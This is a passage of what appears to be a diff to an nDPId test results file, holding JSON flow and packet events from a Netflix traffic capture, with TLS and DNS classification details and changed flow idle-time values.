Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1484319114365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCZ6UAAEARj63AqAEHwKgBAcmmADUALqajKFkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -290,120 +290,120 @@ 00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1484319114384,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319114384,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UpAAEAR1UTAqAEBwKgBBwA1yaYA8aaTKFmBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAhAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAEXABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAALwAENCAW1sBNAAEAAQAAAC8ABDQiMaPATQABAAEAAAAvAAQ0GyTuwE0AAQABAAAALwAENCJwJsBNAAEAAQAAAC8ABDQi04bATQABAAEAAAAvAAQ0GRpcwE0AAQABAAAALwAENCDSq8BNAAEAAQAAAC8ABDQi5lM="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1484319117511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319117511,"pkt":"gCqoTGHM5JjWH70UCABFAABT2RsAAP8RXyXAqAEHwKgBAct\/ADUAP5\/hcXUBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1484319117538,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319117538,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UxAAEAR1XTAqAEBwKgBBwA1y38Av8eGcXWBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAACsABDQpHgXADAABAAEAAAArAAQ0KVZPwAwAAQABAAAAKwAENCnkd8AMAAEAAQAAACsABDQpn7bADAABAAEAAAArAAQ0J+8jwAwAAQABAAAAKwAENCc7i8AMAAEAAQAAACsABDQo+f3ADAABAAEAAAArAAQ0KRH0"} 